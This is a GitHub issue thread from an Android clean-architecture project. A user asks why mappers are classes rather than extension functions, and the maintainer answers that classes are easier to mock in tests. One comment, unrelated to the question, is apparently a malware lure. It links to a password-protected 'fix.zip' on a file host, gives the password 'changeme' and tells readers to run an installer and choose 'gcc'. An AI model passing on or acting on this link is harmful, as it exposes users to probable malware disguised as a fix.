### ISSUE TITLE
[question] use extension function for mapper

### ISSUE THREAD

**Issue by neronguyenvn** [EranBoudjnah/CleanArchitectureForAndroid#232]
Could I ask why you choose class which needed to init for mappers instead of extension functions like `toPresentation` or `toData` for models ?

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by neronguyenvn** [comment]
idea may be it hard for implement TĐ

**Comment by EranBoudjnah** [comment]
Absolutely. The reason is that mocking extension functions is harder. While Mockk can do the job, it is slower than Mockito. I do not wish to exercise the mappers when I test the functions using them. This makes pinning down bugs easier.

**Comment by neronguyenvn** [comment]
thank for dedicate answer
